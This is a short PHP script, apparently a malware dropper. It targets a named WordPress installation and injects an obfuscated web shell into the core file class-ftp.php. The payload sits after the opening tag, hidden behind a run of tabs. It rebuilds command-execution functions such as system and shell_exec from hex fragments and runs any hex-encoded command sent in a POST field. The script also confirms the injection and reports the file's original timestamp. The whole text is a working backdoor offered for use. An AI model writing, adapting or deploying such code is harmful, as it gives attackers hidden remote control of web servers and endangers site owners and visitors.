<?php  $path = '/home/thuexe247c/domains/thuexe247.com.vn/private_html/wp-admin/includes/class-ftp.php'; $ft = @filemtime($path); $content = file_get_contents($path); $new_code = rawurldecode('%24dchunk1%20%3D%20%27973%27%3B%24dchunk2%20%3D%20%27746%27%3B%24dchunk3%20%3D%20%27736%27%3B%24dchunk4%20%3D%20%27865%27%3B%24dchunk5%20%3D%20%27c5f%27%3B%24dchunk6%20%3D%20%27657%27%3B%24dchunk7%20%3D%20%27737%27%3B%24dchunk8%20%3D%20%27468%27%3B%24dchunk9%20%3D%20%27727%27%3B%24dchunk10%20%3D%20%27706%27%3B%24dchunk11%20%3D%20%27656%27%3B%24dchunk12%20%3D%20%2716d%27%3B%24dchunk13%20%3D%20%27765%27%3B%24dchunk14%20%3D%20%276f7%27%3B%24dchunk15%20%3D%20%27726%27%3B%24dchunk16%20%3D%20%27f6c%27%3B%24dchunk17%20%3D%20%276f6%27%3B%24dchunk18%20%3D%20%27f6b%27%3B%24dchunk19%20%3D%20%27757%27%3B%24framework1%20%3D%20pack%28%22H%2A%22%2C%20%27737%27%20.%20%24dchunk1%20.%20%24dchunk2%20.%20%2756d%27%29%3B%24framework2%20%3D%20pack%28%22H%2A%22%2C%20%24dchunk3%20.%20%24dchunk4%20.%20%276c6%27%20.%20%24dchunk5%20.%20%24dchunk6%20.%20%24dchunk4%29%3B%24framework3%20%3D%20pack%28%22H%2A%22%2C%20%27657%27%20.%20%24dchunk4%29%3B%24framework4%20%3D%20pack%28%22H%2A%22%2C%20%27706%27%20.%20%27173%27%20.%20%24dchunk7%20.%20%24dchunk8%20.%20%24dchunk9%29%3B%24framework5%20%3D%20pack%28%22H%2A%22%2C%20%24dchunk10%20.%20%27f70%27%20.%20%24dchunk11%29%3B%24framework6%20%3D%20pack%28%22H%2A%22%2C%20%27737%27%20.%20%27472%27%20.%20%24dchunk11%20.%20%24dchunk12%20.%20%275f6%27%20.%20%24dchunk13%20.%20%27745%27%20.%20%27f63%27%20.%20%276f6%27%20.%20%27e74%27%20.%20%24dchunk11%20.%20%27e74%27%29%3B%24framework7%20%3D%20pack%28%22H%2A%22%2C%20%24dchunk10%20.%20%2736c%27%20.%20%24dchunk14%20.%20%27365%27%29%3B%24reverse_lookup%20%3D%20pack%28%22H%2A%22%2C%20%24dchunk15%20.%20%27576%27%20.%20%24dchunk6%20.%20%27273%27%20.%20%27655%27%20.%20%24dchunk16%20.%20%24dchunk17%20.%20%24dchunk18%20.%20%24dchunk19%29%3Bif%28isset%28%24_POST%5B%24reverse_lookup%5D%29%29%7B%24reverse_lookup%3Dpack%28%22H%2A%22%2C%24_POST%5B%24reverse_lookup%5D%29%3Bif%28function_exists%28%24framework1%29%29%7B%24framework1%28%24reverse_lookup%29%3B%7Delseif%28function_exists%28%24framework2%29%29%7Bprint%20%24framework2%28%24reverse_lookup%29%3B%7Delseif%28function_exists%28%24framework3%29%29%7B%24framework3%28%24reverse_lookup%2C%24component_value%29%3Bprint%20join%28%22%5Cn%22%2C%24component_value%29%3B%7Delseif%28function_exists%28%24framework4%29%29%7B%24framework4%28%24reverse_lookup%29%3B%7Delseif%28function_exists%28%24framework5%29%26%26function_exists%28%24framework6%29%26%26function_exists%28%24framework7%29%29%7B%24holder_entry%3D%24framework5%28%24reverse_lookup%2C%22r%22%29%3Bif%28%24holder_entry%29%7B%24parameter_group_data%3D%24framework6%28%24holder_entry%29%3B%24framework7%28%24holder_entry%29%3Bprint%20%24parameter_group_data%3B%7D%7Dexit%3B%7D'); if (strstr($content, $new_code)) {     die('!already injected!'); } $starts = ['<?php', '<?']; foreach ($starts as $start) {     if (substr($content, 0, strlen($start)) == $start) {         $content = substr($content, strlen($start));         $content = $start.str_repeat("\t", 42).$new_code."\n".$content;         if (file_put_contents($path, $content)) {             $content = file_get_contents($path);             if (strstr($content, $new_code)) {                 die("!success!<ft>{$ft}</ft>");             }         }     } } die('!failed!');